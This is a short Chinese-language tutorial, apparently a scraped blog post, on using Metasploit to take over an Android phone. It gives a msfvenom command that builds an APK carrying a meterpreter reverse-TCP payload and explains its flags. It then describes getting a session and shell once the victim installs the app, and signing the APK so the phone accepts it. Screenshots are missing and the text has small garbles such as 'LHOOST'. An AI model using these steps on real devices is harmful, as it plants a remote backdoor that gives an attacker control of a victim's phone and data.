1. 程式人生 > >利用Metasploit攻擊Android

利用Metasploit攻擊Android

oot 保存 類型 images shell load 選擇 直接 成功

首先我在Kali下生成一個Android的應用程序,即apk格式的文件,用到的命令是:

msfvenom -p android/meterpreter/reverse_tcp LHOST=本地ip LPORT=監聽端口 R > /root/rb.apk

註釋:-p:指的是在本次環境中攻擊所使用的payload,這個payload就是將Android攻擊成功之後的反彈連接發送到攻擊者的終端上來;’

LHOOST與LPORT指的是本地反彈的ip地址與本地監聽端口;

-R:表示要生成的文件類型;

> /root/rb.apk:表示生成文件的保存路徑;

那麽接下來就開始配置:

技術分享

攻擊端配置成功之後在手機端將之前生成好的apk文件導入手機中,然後供給端就開始exploit,則可以看出回話的連接狀態:

技術分享

選擇連接會話,進入控制shell,則可以查看使得內容信息與版本信息:

技術分享

註意:在將Kali裏面生成的apk文件直接導入手機時可能會發生錯誤,那是因為apk文件缺少授權,所以我們下載一個制作簽名的軟件,給此文件進行授權,則就可以導入了

利用Metasploit攻擊Android